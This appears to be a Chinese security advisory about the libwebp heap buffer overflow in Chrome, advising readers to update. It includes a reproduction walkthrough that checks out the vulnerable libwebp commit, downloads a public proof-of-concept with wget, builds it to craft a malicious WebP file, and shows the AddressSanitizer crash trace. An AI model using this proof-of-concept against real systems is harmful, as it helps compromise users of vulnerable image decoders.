WebP图像编解码库libwebp存在堆缓冲区溢出漏洞(升级Google Chrome浏览器为最新版本)

https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html

https://blog.isosceles.com/the-webp-0day

  # checkout webp$ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test$ cd webp_test/  # checkout vulnerable version$ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0  # enable AddressSanitizer$ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix  # build webp$ make -f makefile.unix$ cd examples/  # fetch mistymntncop's proof-of-concept code$ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c  # build and run proof-of-concept$ gcc -o craft craft.c$ ./craft bad.webp  # test trigger file$ ./dwebp bad.webp -o test.png===================================================================207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80WRITE of size 1 at 0x626000002f28 thread T0#0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359)#1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7)#2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff)#3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5)#4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216)#5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b)#6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06)#7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026)#8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308#9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d)0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28)allocated by thread T0 here:#0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144#1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb)SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable...

https://www.google.cn/chrome/